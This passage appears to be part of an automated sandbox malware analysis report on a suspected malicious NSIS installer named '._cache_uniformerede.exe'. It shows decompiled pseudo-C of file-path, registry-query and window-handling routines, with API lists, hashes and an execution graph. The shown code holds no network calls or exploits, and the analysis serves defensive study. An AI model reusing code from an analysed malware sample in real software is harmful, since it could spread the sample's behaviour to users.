                                                                                                                                                                                                                            • CloseHandle.KERNEL32(000002A0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp, xrefs: 00403C5B
                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp
                                                                                                                                                                                                                            • API String ID: 2962429428-4239285139
                                                                                                                                                                                                                            • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                                                                                                                            • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                                                                                                                                                                                            0x0040604b
                                                                                                                                                                                                                            0x00406056
                                                                                                                                                                                                                            0x0040605a
                                                                                                                                                                                                                            0x00406061
                                                                                                                                                                                                                            0x0040606d
                                                                                                                                                                                                                            0x0040607d
                                                                                                                                                                                                                            0x0040607f
                                                                                                                                                                                                                            0x00406097
                                                                                                                                                                                                                            0x00406098
                                                                                                                                                                                                                            0x0040609f
                                                                                                                                                                                                                            0x004060a0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406083
                                                                                                                                                                                                                            0x0040608a
                                                                                                                                                                                                                            0x00406092
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040608a
                                                                                                                                                                                                                            0x004060a2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004060b6
                                                                                                                                                                                                                            0x0040606f
                                                                                                                                                                                                                            0x00406075
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406075
                                                                                                                                                                                                                            0x0040605c
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00405FF0
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                                                                                                                                              • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560,00000000), ref: 00406098
                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7620FAA0,?,7620F560,00405D94,?,7620FAA0,7620F560), ref: 004060A8
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                            • String ID: P_B
                                                                                                                                                                                                                            • API String ID: 3248276644-906794629
                                                                                                                                                                                                                            • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                                                                                                                            • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                                                                                            			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}





                                                                                                                                                                                                                            0x00405642
                                                                                                                                                                                                                            0x0040564c
                                                                                                                                                                                                                            0x00405668
                                                                                                                                                                                                                            0x0040568a
                                                                                                                                                                                                                            0x0040568d
                                                                                                                                                                                                                            0x00405693
                                                                                                                                                                                                                            0x0040569d
                                                                                                                                                                                                                            0x0040569e
                                                                                                                                                                                                                            0x004056a0
                                                                                                                                                                                                                            0x004056a6
                                                                                                                                                                                                                            0x004056a6
                                                                                                                                                                                                                            0x004056b0
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004056be
                                                                                                                                                                                                                            0x00405675
                                                                                                                                                                                                                            0x004056ad
                                                                                                                                                                                                                            0x004056ad
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004056ad
                                                                                                                                                                                                                            0x00405681
                                                                                                                                                                                                                            0x00405683
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405683
                                                                                                                                                                                                                            0x00405652
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405659
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                                                                                                                                              • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                            • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                                                                                                                            • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406536 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E00406536(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004064D5(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                                                                                                                                                                                            0x00406544
                                                                                                                                                                                                                            0x00406546
                                                                                                                                                                                                                            0x0040655e
                                                                                                                                                                                                                            0x00406563
                                                                                                                                                                                                                            0x00406568
                                                                                                                                                                                                                            0x004065a6
                                                                                                                                                                                                                            0x004065a6
                                                                                                                                                                                                                            0x0040656a
                                                                                                                                                                                                                            0x0040657c
                                                                                                                                                                                                                            0x00406587
                                                                                                                                                                                                                            0x0040658d
                                                                                                                                                                                                                            0x00406598
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406598
                                                                                                                                                                                                                            0x004065ac

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00406587
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                                                                            • String ID: Call
                                                                                                                                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                                                                                                                                            • Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                                                                                                                                                                                            • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                                                                                                                                                                                            0x00405f84
                                                                                                                                                                                                                            0x00405f8e
                                                                                                                                                                                                                            0x00405f91
                                                                                                                                                                                                                            0x00405f97
                                                                                                                                                                                                                            0x00405f98
                                                                                                                                                                                                                            0x00405f99
                                                                                                                                                                                                                            0x00405fa1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405fa1
                                                                                                                                                                                                                            0x00405fa3
                                                                                                                                                                                                                            0x00405fab

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\._cache_uniformerede.exe,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 00405F89
                                                                                                                                                                                                                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\._cache_uniformerede.exe,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 00405F99
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharPrevlstrlen
                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                            • API String ID: 2709904686-1669384263
                                                                                                                                                                                                                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                            • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                                                                                                                                                            0x004060cd
                                                                                                                                                                                                                            0x004060cf
                                                                                                                                                                                                                            0x004060d2
                                                                                                                                                                                                                            0x004060fe
                                                                                                                                                                                                                            0x004060d7
                                                                                                                                                                                                                            0x004060e0
                                                                                                                                                                                                                            0x004060e5
                                                                                                                                                                                                                            0x004060f0
                                                                                                                                                                                                                            0x004060f3
                                                                                                                                                                                                                            0x0040610f
                                                                                                                                                                                                                            0x004060f5
                                                                                                                                                                                                                            0x004060fc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004060fc
                                                                                                                                                                                                                            0x00406108
                                                                                                                                                                                                                            0x0040610c
                                                                                                                                                                                                                            0x0040610c
                                                                                                                                                                                                                            0x00406106
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                            • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                                                                                                                            • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:7.6%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:0.3%
                                                                                                                                                                                                                            Total number of Nodes:1062
                                                                                                                                                                                                                            Total number of Limit Nodes:56
                                                                                                                                                                                                                            execution_graph 46475 402cc2 ReadFile 46476 402ceb GetLastError 46475->46476 46477 402cf5 46475->46477 46476->46477 46478 45f1c0 46490 417608 46478->46490 46480 45f1f2 46481 45f1f6 46480->46481 46482 45f1ff 46480->46482 46497 45d2f8 SHGetSpecialFolderLocation 46481->46497 46498 45d3f8 46482->46498 46486 45f1fb 46506 4049c0 46486->46506 46491 417613 46490->46491 46494 41761d 46490->46494 46510 409628 46491->46510 46495 41763b 46494->46495 46496 409628 57 API calls 46494->46496 46495->46480 46496->46495 46497->46486 46515 40de68 46498->46515 46501 45d324 46633 4051ec 46501->46633 46503 45d35b 46649 4050a0 46503->46649 46507 4049c6 46506->46507 46509 4049e1 46506->46509 46508 40277c 12 API calls 46507->46508 46507->46509 46508->46509 46511 409638 46510->46511 46512 409659 46511->46512 46514 408c7c 57 API calls 46511->46514 46512->46480 46514->46512 46518 40de7c 46515->46518 46523 404a14 46518->46523 46520 40de8b 46521 40de77 46520->46521 46529 404c88 46520->46529 46521->46501 46524 404a18 46523->46524 46527 404a28 46523->46527 46524->46527 46543 404a84 46524->46543 46525 404a56 46525->46520 46527->46525 46548 40277c 46527->46548 46530 404ccb 46529->46530 46531 404c8c 46529->46531 46530->46521 46532 404c96 46531->46532 46538 404a14 46531->46538 46533 404cc0 46532->46533 46534 404ca9 46532->46534 46632 40500c 26 API calls 46533->46632 46631 40500c 26 API calls 46534->46631 46536 404a56 46536->46521 46539 404a84 25 API calls 46538->46539 46540 404a28 46538->46540 46539->46540 46540->46536 46541 40277c 12 API calls 46540->46541 46541->46536 46542 404cae 46542->46521 46544 404a88 46543->46544 46545 404aac 46543->46545 46553 40275c 46544->46553 46545->46527 46549 402781 46548->46549 46550 402796 46548->46550 46549->46550 46551 4028b8 11 API calls 46549->46551 46550->46525 46552 402794 KiUserExceptionDispatcher 46551->46552 46552->46550 46554 402761 46553->46554 46555 402774 46553->46555 46559 402188 46554->46559 46555->46527 46556 402767 46556->46555 46570 4028b8 46556->46570 46560 4021a1 46559->46560 46561 40219c 46559->46561 46563 4021ce RtlEnterCriticalSection 46560->46563 46564 4021d8 46560->46564 46567 4021ad 46560->46567 46576 401a9c RtlInitializeCriticalSection 46561->46576 46563->46564 46564->46567 46583 402094 46564->46583 46567->46556 46568 402303 46568->46556 46569 4022f9 RtlLeaveCriticalSection 46569->46568 46571 40286c 46570->46571 46572 402891 46571->46572 46621 406cdc 46571->46621 46629 402860 7 API calls 46572->46629 46575 4028b3 46575->46555 46577 401ac0 RtlEnterCriticalSection 46576->46577 46578 401aca 46576->46578 46577->46578 46579 401ae8 LocalAlloc 46578->46579 46580 401b02 46579->46580 46581 401b51 46580->46581 46582 401b47 RtlLeaveCriticalSection 46580->46582 46581->46560 46582->46581 46586 4020a4 46583->46586 46584 4020d0 46588 4020f4 46584->46588 46594 401ea8 46584->46594 46586->46584 46586->46588 46589 402008 46586->46589 46588->46568 46588->46569 46598 40185c 46589->46598 46591 402018 46592 402025 46591->46592 46607 401f7c 9 API calls 46591->46607 46592->46586 46595 401efd 46594->46595 46596 401ec6 46594->46596 46595->46596 46608 401df8 46595->46608 46596->46588 46601 401878 46598->46601 46599 4015b4 LocalAlloc VirtualAlloc VirtualFree 46599->46601 46600 401882 46602 401748 VirtualAlloc 46600->46602 46601->46599 46601->46600 46603 4014b0 LocalAlloc 46601->46603 46604 4018d3 46601->46604 46606 40188e 46601->46606 46602->46606 46603->46601 46605 401690 VirtualFree 46604->46605 46605->46606 46606->46591 46607->46592 46609 401e0e 46608->46609 46610 401e96 46609->46610 46611 401e39 46609->46611 46612 401e4d 46609->46612 46610->46596 46613 401a10 LocalAlloc VirtualFree VirtualFree 46611->46613 46614 401a10 LocalAlloc VirtualFree VirtualFree 46612->46614 46615 401e4b 46613->46615 46614->46615 46615->46610 46616 401cd4 9 API calls 46615->46616 46617 401e71 46616->46617 46618 401e8b 46617->46618 46619 401d28 9 API calls 46617->46619 46620 401520 LocalAlloc 46618->46620 46619->46618 46620->46610 46622 406d11 